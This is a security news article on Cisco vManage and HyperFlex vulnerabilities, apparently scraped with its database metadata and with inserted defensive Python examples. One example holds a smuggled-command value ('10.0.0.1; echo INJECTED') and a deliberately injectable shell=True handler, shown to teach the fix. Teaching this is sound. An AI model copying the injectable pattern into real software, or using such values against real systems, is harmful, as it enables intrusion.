Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.
The networking giant also disclosed a denial-of-service (DoS) issue in vManage, along with three bugs that would allow an attacker who already holds valid credentials to escalate privileges or gain unauthorized access to applications and services.
Separately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.
## **Critical vManage Security Bugs**
vManage is the centralized network management system for Cisco SD-WAN; it provides a graphical interface for monitoring, configuring and maintaining every device and link in the SD-WAN overlay. According to Cisco’s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software. The first four are only exploitable when the platform is running in cluster mode:
* CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)
* CVE-2021-1505: Critical Privilege-Escalation Vulnerability
* CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability
* CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability
* CVE-2021-1275: High-Severity Denial-of-Service Vulnerability
The issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS severity score of 9.8 out of 10. It exists in the messaging service used by vManage and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.
Join Threatpost for “[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>),” a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT. This FREE webinar is sponsored by Zoho ManageEngine.
Unauthenticated, remote adversaries could exploit it by submitting crafted input to the service. That would let them call privileged actions within the affected system, including creating new administrator-level user accounts, the advisory said.
Meanwhile, the privilege-escalation bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking and gain elevated privileges within the system. The attacker needs an existing login to the interface, but any valid account is enough: the flaw is in what a logged-in user is permitted to do, not in how the user logs in.
Similarly, CVE-2021-1508, with a CVSS score of 8.1, is an authorization-bypass bug in the same web-based management interface. It would allow an authenticated, remote attacker to gain access to forbidden applications, modify those applications and gain elevated privileges.
Both bugs exist “because the affected software does not perform authorization checks on certain operations,” according to Cisco.
A third bug of the same kind, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn’t perform authorization checks on service access.
In all three cases, an attacker could trigger the flaw by sending crafted requests to the affected system.
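The distinction the three authorization bugs turn on, and the missing authentication check behind CVE-2021-1468, are easiest to see side by side in code. The following is an added illustration, not Cisco code and not vManage's implementation: a toy request dispatcher for a management interface with two constructed roles ("admin" and "operator"), three constructed operations and a constructed backend state. The vulnerable handler only checks that the caller presents a valid session, so any logged-in user can create an administrator account or open a privileged service; the hardened handler also consults a deny-by-default permission map for the specific operation requested.

```python
"""Authentication vs. per-operation authorization (added illustration, not Cisco code)."""
from dataclasses import dataclass


class AuthenticationError(Exception):
    """Caller has no valid session."""


class AuthorizationError(Exception):
    """Caller is logged in but not permitted to perform this operation."""


@dataclass(frozen=True)
class Session:
    user: str
    role: str  # constructed roles: "admin" or "operator"


def new_state():
    """Constructed backend state: user accounts and managed devices."""
    return {"users": {"alice": "admin", "bob": "operator"},
            "devices": ["edge-1", "edge-2"]}


# Constructed operations. create_user is the "create an administrative
# account" action the advisory describes; access_service stands in for the
# service endpoints an unprivileged user should not be able to reach.
def op_list_devices(args, state):
    return list(state["devices"])


def op_create_user(args, state):
    state["users"][args["name"]] = args["role"]
    return f"created {args['name']} as {args['role']}"


def op_access_service(args, state):
    return f"service {args['service']} opened"


OPERATIONS = {
    "list_devices": op_list_devices,
    "create_user": op_create_user,
    "access_service": op_access_service,
}

# Deny-by-default permission map: an operation absent from this table is
# allowed for nobody, so adding a new endpoint cannot silently expose it.
PERMISSIONS = {
    "list_devices": frozenset({"admin", "operator"}),
    "create_user": frozenset({"admin"}),
    "access_service": frozenset({"admin"}),
}


def handle_vulnerable(session, op, args, state):
    """Checks authentication only: who you are, never what you may do."""
    if session is None:
        raise AuthenticationError("login required")
    return OPERATIONS[op](args, state)


def handle_hardened(session, op, args, state):
    """Checks authentication, then authorization for this specific operation."""
    if session is None:
        raise AuthenticationError("login required")
    if session.role not in PERMISSIONS.get(op, frozenset()):
        raise AuthorizationError(f"{session.user} ({session.role}) may not {op}")
    return OPERATIONS[op](args, state)


def outcome(handler, session, op, args, state):
    """Run a handler and summarise the result as (label, value) for demos."""
    try:
        return ("ok", handler(session, op, args, state))
    except AuthenticationError:
        return ("unauthenticated", None)
    except AuthorizationError:
        return ("forbidden", None)


if __name__ == "__main__":
    bob = Session("bob", "operator")
    payload = {"name": "eve", "role": "admin"}
    print(outcome(handle_vulnerable, bob, "create_user", payload, new_state()))
    print(outcome(handle_hardened, bob, "create_user", payload, new_state()))
```

The point to check in any management interface you review is the second `if` in `handle_hardened`: a per-operation lookup that fails closed. An interface that validates the session once at login and then routes every request straight to its handler has exactly the shape Cisco describes as "does not perform authorization checks on certain operations".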
And finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large number of API requests to a target system to tie it up and prevent it from functioning properly.
“The vulnerability is due to insufficient handling of API requests to the affected system,” according to Cisco.
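Cisco does not say how the API fell over, only that its handling of request volume was insufficient. The generic control a management API needs in front of expensive handlers is per-client rate limiting, and the following added example (not Cisco code and not a description of the vManage fix) shows one: a token bucket per client key that absorbs a short burst and then rejects excess calls with 429 before any work is done. The request stream, the client addresses and the `/api/v1/devices` path are constructed, and a fake clock keeps the run deterministic.

```python
"""Per-client token-bucket rate limiting for an API (added illustration, not Cisco code)."""
import time


class TokenBucket:
    """Allows `burst` requests immediately, then `rate` requests per second."""

    def __init__(self, rate, burst, clock=time.monotonic):
        self.rate = float(rate)
        self.burst = float(burst)
        self.clock = clock
        self.tokens = self.burst
        self.updated = clock()

    def allow(self):
        now = self.clock()
        # Refill in proportion to elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class ApiGate:
    """One bucket per client key (source IP or API token, as the deployment prefers)."""

    def __init__(self, rate, burst, clock=time.monotonic):
        self.rate, self.burst, self.clock = rate, burst, clock
        self.buckets = {}

    def handle(self, client, path):
        bucket = self.buckets.setdefault(client, TokenBucket(self.rate, self.burst, self.clock))
        if not bucket.allow():
            return 429  # Too Many Requests: rejected before the handler runs
        return 200      # would dispatch to the real handler for `path`


class FakeClock:
    """Deterministic clock so the simulation gives the same result everywhere."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t


def simulate(requests, rate=3, burst=10):
    """Replay (client, path, t) tuples through ApiGate; return status counts per client."""
    clock = FakeClock()
    gate = ApiGate(rate, burst, clock)
    counts = {}
    for client, path, t in sorted(requests, key=lambda r: r[2]):
        clock.t = t
        status = gate.handle(client, path)
        counts.setdefault(client, {200: 0, 429: 0})[status] += 1
    return counts


def constructed_traffic():
    """Constructed traffic: one source floods 100 requests in one second while
    a normal client sends 5 requests spread over the same second."""
    flood = [("203.0.113.7", "/api/v1/devices", i * 0.01) for i in range(100)]
    normal = [("198.51.100.2", "/api/v1/devices", i * 0.2) for i in range(5)]
    return flood + normal


if __name__ == "__main__":
    for client, counts in simulate(constructed_traffic()).items():
        print(client, counts)
```

With a burst of 10 and a refill of 3 tokens per second, the flooding source gets its first 10 requests through and only 2 more in the rest of the second; the other 88 are refused without touching the backend, while the well-behaved client is never throttled. Keying the bucket on something the attacker cannot freely vary (an authenticated token where the API requires one, a source address where it does not) is what makes the limit meaningful.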
## **Cisco HyperFlex HX Command-Injection Bugs**
Cisco HyperFlex HX is the company’s hyperconverged infrastructure platform. Its software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers, across both traditional and cloud-native/containerized workloads.
Cisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform’s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.
Cisco has patched two security bugs in HyperFlex HX in total:
* CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability
* CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability
The first, CVE-2021-1497, is a critical flaw with a 9.8 CVSS rating. “This vulnerability is due to insufficient validation of user-supplied input,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.”
The second, CVE-2021-1498, rates 7.2 on the CVSS scale and is likewise due to insufficient validation of user-supplied input, according to Cisco, which added, “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.”
Both flaws can be exploited by sending a crafted request to the web-based management interface; neither requires the attacker to authenticate first.
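"Insufficient validation of user-supplied input" leading to commands run as root or tomcat8 is the textbook shape of OS command injection in a web handler. The following added example is not HyperFlex code and does not reproduce the actual vulnerable endpoint: it shows a handler that interpolates a request parameter into a shell command line, beside a hardened version that validates the parameter against the syntax it is supposed to carry (an IP address or a hostname) and then runs the program with an argument vector and no shell. `echo` stands in for whatever tool the real handler invokes, so the example is harmless to run; the hostname pattern is a conventional RFC 1123 check I chose for the example.

```python
"""OS command injection in a web handler, and its fix (added illustration, not Cisco code)."""
import ipaddress
import re
import subprocess

# RFC 1123 host names: dot-separated labels of letters, digits and hyphens,
# 1..63 characters each, no leading or trailing hyphen, 253 characters total.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def run_vulnerable(target):
    """Shell string built from user input: every metacharacter is honoured,
    so "10.0.0.1; id" runs `id` with the privileges of the web process."""
    cmd = f"echo {target}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_target(target):
    """Accept only an IP literal or a well-formed host name; reject anything else.

    Positive validation against the expected grammar, not a denylist of
    characters: the pattern also rules out a leading '-', which would
    otherwise let a 'host name' be parsed by the tool as an option."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if _HOSTNAME.match(target):
        return target
    raise ValueError(f"invalid target: {target!r}")


def run_hardened(target):
    """Validated input passed as one argv element with no shell: the value
    reaches the program as data, and nothing re-parses it as code."""
    safe = validate_target(target)
    proc = subprocess.run(["echo", safe], shell=False, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "10.0.0.1; echo INJECTED"
    print("vulnerable:", run_vulnerable(payload).split())
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

Both layers matter: the argument vector alone stops the shell from interpreting `;`, `$(...)` and backticks, and the grammar check alone stops hostile values from reaching a tool that might interpret them itself. Dropping the shell without validating, or validating while still building a shell string, leaves one of those paths open.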
These are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.
{"id": "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "type": "threatpost", "bulletinFamily": "info", "title": "Critical Cisco SD-WAN, HyperFlex Bugs Menace Networks", "description": "Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.\n\nThe networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.\n\nSeparately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.\n\n## **Critical vManage Security Bugs**\n\nvManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:\n\n * CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)\n * CVE-2021-1505: Critical Privilege-Escalation Vulnerability\n * CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability\n * CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability\n * CVE-2021-1275: High-Severity Denial-of-Service Vulnerability\n\nThe issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. 
It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nUnauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.\n\nMeanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.\n\nSimilarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.\n\nBoth local bugs exist \u201cbecause the affected software does not perform authorization checks on certain operations,\u201d according to Cisco.\n\nA third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. 
It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn\u2019t perform authorization checks on service access.\n\nAnd in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.\n\nAnd finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.\n\n\u201cThe vulnerability is due to insufficient handling of API requests to the affected system,\u201d according to Cisco.\n\n## **Cisco HyperFlex HX Command-Injection Bugs**\n\nThe HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers \u2013 across both traditional and cloud-native/containerized applications.\n\nCisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform\u2019s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.\n\nCisco has patched two security bugs in HyperFlex HX in total:\n\n * CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability\n * CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability\n\nThe first is a critical flaw with a 9.8 CVSS rating,\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d according to Cisco. 
\u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.\u201d\n\nThe second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.\u201d\n\nBoth flaws can be exploited by sending a crafted request to the web-based management interface.\n\nThese are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. 
Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "published": "2021-05-06T17:54:33", "modified": "2021-05-06T17:54:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/critical-cisco-sd-wan-hyperflex-bugs/165923/", "reporter": "Tara Seals", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "https://threatpost.com/cisco-critical-security-flaw/164255/", "https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar"], "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "immutableFields": [], "lastseen": "2021-05-07T18:46:24", "viewCount": 62, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", 
"idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416", "CPAI-2022-0284"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ"]}, {"type": "cve", "idList": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"]}, {"type": "nessus", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ"]}, {"type": "cve", "idList": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"]}, {"type": "nessus", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": 
["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "exploitation": null, "vulnersScore": 0.8}, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659925232}, "_internal": {"score_hash": "9af347d4744f01e2c40d4c69f3fc9cab"}}
{"thn": [{"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-50vFnI5p98k/YJPgYtKAl9I/AAAAAAAACd8/1v7GG_-Ci1Ue9y2cRLkwDJeb39bmkPtYwCLcBGAsYHQ/s0/cisco.jpg>)\n\nNetworking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information.\n\nIn a series of advisories published on May 5, the company said there are no workarounds that remediate the issues.\n\nThe HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device.\n\n\"An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface,\" the company [said](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) in its alert. 
\"A successful exploit could allow the attacker to execute arbitrary commands\" either as a root or tomcat8 user.\n\nCisco also squashed [five glitches](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>) affecting SD-WAN vManage Software (CVE-2021-1275, CVE-2021-1468, CVE-2021-1505, CVE-2021-1506, and CVE-2021-1508) that could permit an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nNikita Abramov and Mikhail Klyuchnikov of Positive Technologies have been credited with reporting the HyperFlex HX flaws, whereas four of the SD-WAN vManage bugs were identified during internal security testing, with CVE-2021-1275 uncovered during the resolution of a Cisco Technical Assistance Center (TAC) support case.\n\nWhile there is no evidence of malicious use of the vulnerabilities in the wild, it's recommended that users upgrade to the latest version to mitigate the risk associated with the flaws.\n\n### VMware Fixes Critical vRealize Business for Cloud Bug\n\nIt's not just Cisco. VMware on Wednesday released patches to fix a [critical severity flaw](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>) in vRealize Business for Cloud 7.6 that enables unauthenticated attackers to execute malicious code on vulnerable servers remotely.\n\nThe remote code execution flaw (CVE-2021-21984, CVSS score: 9.8) stems from an unauthorized [VAMI endpoint](<https://docs.vmware.com/en/VMware-Adapter-for-SAP-Landscape-Management/2.0.1/Installation-and-Administration-Guide-for-VLA-Administrators/GUID-CEEB151C-8B44-47B3-8D16-CB97BB865B2F.html>), resulting in a scenario that could cause an adversary with network access to run unauthorized code on the appliance. 
Affected customers can rectify the issue by [installing](<https://kb.vmware.com/s/article/83475>) the security patch ISO file.\n\nVmware credited Egor Dimitrenko of Positive Technologies for reporting the vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:30:00", "type": "thn", "title": "Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508", "CVE-2021-21984"], "modified": "2021-05-07T01:50:39", "id": "THN:E5C91FC48CC9CB51116164A4422D17F8", "href": "https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", 
"description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging 
it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * 